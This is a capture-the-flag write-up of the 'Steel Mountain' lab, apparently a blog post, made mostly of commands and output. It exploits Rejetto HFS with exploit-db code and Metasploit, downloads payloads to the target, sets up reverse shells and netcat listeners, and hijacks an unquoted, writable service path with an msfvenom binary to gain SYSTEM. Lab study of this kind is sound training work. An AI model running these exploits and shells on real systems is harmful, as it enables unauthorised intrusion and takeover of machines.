Steel Mountain
1
2
3
export IP=10.10.6.167
Inital Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
nmap -sC -sV -vvv -T5 $IP
Discovered open port 80/tcp on 10.10.6.167
Discovered open port 139/tcp on 10.10.6.167
Discovered open port 445/tcp on 10.10.6.167
Discovered open port 3389/tcp on 10.10.6.167
Discovered open port 8080/tcp on 10.10.6.167
Discovered open port 135/tcp on 10.10.6.167
Discovered open port 49156/tcp on 10.10.6.167
Discovered open port 49152/tcp on 10.10.6.167
Discovered open port 49153/tcp on 10.10.6.167
Discovered open port 49154/tcp on 10.10.6.167
Discovered open port 49155/tcp on 10.10.6.167
ot shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server? syn-ack
| ssl-cert: Subject: commonName=steelmountain
| Issuer: commonName=steelmountain
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-05-07T06:00:58
| Not valid after: 2022-11-06T06:00:58
| MD5: 73f9 6f2a 1bff 257e c3a7 e0fb c80b f02e
| SHA-1: 1d95 7bf6 a120 07d1 85f5 b8e2 a4b1 ce84 e5c6 143a
| -----BEGIN CERTIFICATE-----
| MIIC3jCCAcagAwIBAgIQbKtHqjHTk75BRoVo5YAhkzANBgkqhkiG9w0BAQUFADAY
| MRYwFAYDVQQDEw1zdGVlbG1vdW50YWluMB4XDTIyMDUwNzA2MDA1OFoXDTIyMTEw
| NjA2MDA1OFowGDEWMBQGA1UEAxMNc3RlZWxtb3VudGFpbjCCASIwDQYJKoZIhvcN
| AQEBBQADggEPADCCAQoCggEBAN9QaU/WhiGlYPhDdMQTaB0axDKhhfs4BLBzwYsJ
| ixC+2Qc92rAiOzQ5+6l/YMLHspWpbTp9KTxrQgpj6AP2k5p6zf1vR43K+3gTyyLX
| cUXTporBbpNAX5VFC8/xv7sIT6txkYr19HYFTQdezwAv0ZCXwTngDH5p6XXUiY1i
| rUWUVnne3o3xZAvv18eSfGNAC1xoIGJfVla+NtbQa61SQROB6S2UA7NiD4BQtsmv
| n3MuupKU/5Uc9YNE2rBzN/QSI3+rOWkSuD/eAGBeIweVJ9Npriy/GTEJLesvvTwr
| Ky68PFUd6P3P+9yhOzi0R8trFu9TbAJZ6gr9x+4MtoKnOa0CAwEAAaMkMCIwEwYD
| VR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEBBQUAA4IB
| AQBl5TkpEcG1D9X7GipjLyCLiqjB4AH4YgcKQIj8urSiakTSArFJxn2deXPoA2tl
| Uk4rPZ+1OPCQjHoZ23BUVOjMomnr2wB1Y94lT1NtQeRNv7ZcPPuJwVNhWAtT/ial
| errV4dVdr1LuEHGp273UQiUBWfr+KMRpTb8RnvguZS8wgJG0E8GG5WsWWo4sHp1e
| 7KSacMuKU+KmugHvKS0ccTdAr64Ls+o40ZDvb7IYRZWE3sAQKtjS9c3DMijBBifN
| QCfhx0VB9mda9Xtmr6tO/P88Q7zHoydeOt06LWHNOl28finSmjsXxaIHTzxdEmqH
| i9Xzm/S9w0bbl+zGCbr4lexz
|_-----END CERTIFICATE-----
|_ssl-date: 2022-05-08T06:06:40+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: STEELMOUNTAIN
| NetBIOS_Domain_Name: STEELMOUNTAIN
| NetBIOS_Computer_Name: STEELMOUNTAIN
| DNS_Domain_Name: steelmountain
| DNS_Computer_Name: steelmountain
| Product_Version: 6.3.9600
|_ System_Time: 2022-05-08T06:06:35+00:00
8080/tcp open http syn-ack HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49156/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
| date: 2022-05-08T06:06:35
|_ start_date: 2022-05-08T06:00:49
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:a8:19:41:eb:4d (unknown)
| Names:
| STEELMOUNTAIN<20> Flags: <unique><active>
| STEELMOUNTAIN<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| Statistics:
| 02 a8 19 41 eb 4d 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46572/tcp): CLEAN (Couldn't connect)
| Check 2 (port 58950/tcp): CLEAN (Couldn't connect)
| Check 3 (port 51527/udp): CLEAN (Timeout)
| Check 4 (port 43873/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.30 seconds
Notes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#Port 8080 : open http syn-ack HttpFileServer httpd 2.3
nmap -sC -sV -vvv -T5 --script=vuln $IP
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| vulners:
| cpe:/a:rejetto:httpfileserver:2.3:
| EDB-ID:49584 10.0 https://vulners.com/exploitdb/EDB-ID:49584 *EXPLOIT*
| EDB-ID:49125 10.0 https://vulners.com/exploitdb/EDB-ID:49125 *EXPLOIT*
| EDB-ID:39161 10.0 https://vulners.com/exploitdb/EDB-ID:39161 *EXPLOIT*
| EDB-ID:34668 10.0 https://vulners.com/exploitdb/EDB-ID:34668 *EXPLOIT*
Rejetto HTTP File Server
1
2
3
searchsploit Rejetto HTTP File Server -w
CVE-2014-6287
Access and Escalation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
wget https://www.exploit-db.com/download/39161
┌──(kali㉿kali)-[~/assets]
└─$ python2 39161.py
[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
└─$ nc -nlvp 4443
listening on [any] 4443 ...
┌──(kali㉿kali)-[~/server]
└─$ sudo ufw allow 80
[sudo] password for kali:
Rules updated
Rules updated (v6)
┌──(kali㉿kali)-[~/server]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
─$ wget https://github.com/andrew-d/static-binaries/raw/master/binaries/windows/x86/ncat.exe
└─$ mv ncat.exe server
ip addr
inet 10.11.53.56/16 scope global tun0
(changed local port and local address in .py)
┌──(kali㉿kali)-[~/server]
└─$ mv ncat.exe nc.exe
┌──(kali㉿kali)-[~/assets]
└─$ python2 39161.py 10.10.213.38 8080
┌──(kali㉿kali)-[~/server]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.213.38 - - [08/May/2022 17:58:48] "GET /nc.exe HTTP/1.1" 200 -
10.10.213.38 - - [08/May/2022 17:58:48] "GET /nc.exe HTTP/1.1" 200 -
10.10.213.38 - - [08/May/2022 17:58:48] "GET /nc.exe HTTP/1.1" 200 -
10.10.213.38 - - [08/May/2022 17:58:48] "GET /nc.exe HTTP/1.1" 200 -
└─$ nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.11.53.56] from (UNKNOWN) [10.10.213.38] 49375
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
┌──(kali㉿kali)-[~]
└─$ wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
mv winPEAS.bat /home/kali/server/
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>powershell -c Invoke-WebRequest -Uri "http://10.11.53.56/winPEAS.bat" -OutFile "winpeas.bat"
powershell -c Invoke-WebRequest -Uri "http://10.11.53.56/winPEAS.bat" -OutFile "winpeas.bat"
PS> winpeas.bat
[i] The permissions are also checked and filtered using icacls
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
AdvancedSystemCareService9
powershell -c "Get-Service"
going to target : AdvancedSystemCareService9
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.53.56 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe-service file: 15872 bytes
Saved as: Advanced.exe
┌──(kali㉿kali)-[~/assets]
└─$ mv Advanced.exe ../server
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>cd C:\Program Files (x86)\IObit
cd C:\Program Files (x86)\IObit
powershell -c Invoke-WebRequest -Uri "http://10.11.53.56/Advanced.exe" -OutFile "Advanced.exe"
netcat -nlvp 4443
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3436
FLAGS :
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
[SC] ControlService FAILED 1062:
The service has not been started.
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 4068
FLAGS :
└─$ netcat -nlvp 4443
listening on [any] 4443 ...
connect to [10.11.53.56] from (UNKNOWN) [10.10.213.38] 49469
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system
wMetasploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
msfconsole
msf6 > search Rejetto HTTP File Server
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 0
options
set LHOST tun0
echo $IP
set RHOST 10.10.234.134
set RPORT 8080
set SRVHOST <myip>
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.11.53.56:4444
[*] Using URL: http://10.11.53.56:8080/CQ1tmazB
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /CQ1tmazB
[*] Sending stage (175174 bytes) to 10.10.234.134
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-09-27 07:07:07 -0400 desktop.ini
100666/rw-rw-rw- 70 fil 2019-09-27 08:42:38 -0400 user.txt
meterpreter > cat user.txt
��b04763b6fcf51fcd7c13abc7db4fd365
meterpreter >
Privilege Escalation
We now have a shell for the windows machine under the user bill, we can further enumerate and escalate our privileges to root.
For this I am going to use a PowerShell script called PowerUp, which will evaluate the machine a determine any abnormalities. here
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
meterpreter > upload /home/kali/assets/PowerUp.ps1
[*] uploading : /home/kali/assets/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 2.13 MiB of 2.13 MiB (100.0%): /home/kali/assets/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded : /home/kali/assets/PowerUp.ps1 -> PowerUp.ps1
meterpreter >
load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
AdvancedSystemCareService9
The CanRestart option being True, allows us to restart the service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, going to restart the service, to then run our infected program.
To do this I will run a very basic msfvenom to generate a reverse shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.53.56 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
Modifiable Path:
C:\Program Files (x86)\IObit\
meterpreter > upload /home/kali/assets/Advanced.exe
[*] uploading : /home/kali/assets/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /home/kali/assets/Advanced.exe -> Advanced.exe
[*] uploaded : /home/kali/assets/Advanced.exe -> Advanced.exe
meterpreter >
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 32768 dir 2022-05-08 17:35:38 -0400 Advanced SystemCare
100777/rwxrwxrwx 15872 fil 2022-05-08 17:36:49 -0400 Advanced.exe
040777/rwxrwxrwx 16384 dir 2019-09-27 01:35:24 -0400 IObit Uninstaller
040777/rwxrwxrwx 4096 dir 2019-09-26 11:18:50 -0400 LiveUpdate
meterpreter > shell
Process 2308 created.
Channel 12 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1076
FLAGS :
C:\Program Files (x86)\IObit>
┌──(kali㉿kali)-[~/assets]
└─$ nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.11.53.56] from (UNKNOWN) [10.10.213.38] 49334
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>copy root.txt C:\
copy root.txt C:\
1 file(s) copied.
C:\Users\Administrator\Desktop>
c:\>copy root.txt Users/bill
copy root.txt Users/bill
1 file(s) copied.
c:\>
meterpreter > cat root.txt
9af5f314f57607c00fd09803a587db80
This post is licensed under
CC BY 4.0
by the author.